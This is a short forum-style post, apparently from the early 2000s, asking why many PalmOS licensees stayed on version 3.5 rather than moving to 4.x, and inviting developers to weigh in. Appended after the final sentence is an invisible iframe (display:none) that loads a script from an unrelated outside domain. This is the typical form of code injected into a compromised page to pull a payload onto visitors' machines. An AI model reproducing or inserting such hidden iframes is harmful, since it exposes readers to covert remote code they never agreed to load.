PalmOS 3.5
You know, I have been looking out there, and out of the licencees of PalmOS (Palm, Sony, Handspring, Samsung, Acer, Handera), there is a 50/50 split between devices that have made the migration to PalmOS 4.0 and those that have stayed with 3.5. You can kind of understand why some vendors might lag behind others in releasing the latest and greatest, but PalmOS 4.x has been out for over a year now.
This begs the question "Why". The people that have migrated to PalmOS 4.x all have something in common: the need for an asian char set, which might be why they (except for Palm itself, which pretty much had to) migrated.
I can think of a couple of possibilities, but I don't know the actual reason. Could it be because of licensing costs? Could it be more expensive hardware requirements (doesn't seem likely, as older Palm devices can be upgraded). Is there something basically wrong with PalmOS 4 that hardware developers would prefer to add the features themselves to PalmOS 3.5 than migrate (like the I300 security, and vibrating alarms).
End result, I don't know. Are there any developers out their that would like to put their two cents in? Enquiring minds want to know.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
